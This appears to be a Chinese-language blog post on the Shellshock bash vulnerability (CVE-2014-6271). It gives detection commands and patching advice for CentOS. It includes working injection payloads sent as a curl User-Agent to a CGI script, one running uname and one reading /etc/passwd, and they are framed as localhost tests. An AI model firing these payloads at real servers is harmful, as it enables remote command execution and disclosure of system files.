這次的漏洞叫 shellshock
嚴重等級的漏洞 Linux BASH 套件,影響所有使用 shell CGI 等程式、設備
檢測方式一
直接在 linux console 底下執行
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
出現 vulnerable 字串就是中標了
檢測方式二
vi /var/www/cgi-bin/test.cgi
#!/bin/sh echo "Content-type: text/plain" echo "test"
chmod +x /var/www/cgi-bin/test.cgi
curl http://localhost/cgi-bin/test.cgi
正常會看到 test
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/uname -a " http://localhost/cgi-bin/test.cgi
中標的會看到
Linux XXXXX 2.6.18-348.12.1.el5 #1 SMP Wed Jul 10 05:28:41 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux
你要這麼作也行
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/test.cgi
影響範圍 : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
怎麼修補 http://lists.centos.org/pipermail/centos/2014-September/146099.html
CentOS 就 yum update bash 即可,不用重啟什麼
而 CentOS 4 (含) 以下的,也別花心思升級了,快淘汰吧
留言
http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.3.el4.i386.rpm
bash-3.2-33.el5.1 需要再 update 到 3.2-33.el5_10.4 bash-4.1.2-15.el6_5.1 需要再 update 到 4.1.2-15.el6_5.2 bash-3.0-27.0.1.el4 需要再 update 到 bash-3.0-27.0.2.el4 http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.2.el4.i386.rpm
CentOS4 還可以用這個 http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/i386/getPackage/bash-3.0-27.0.1.el4.i386.rpm ref : http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014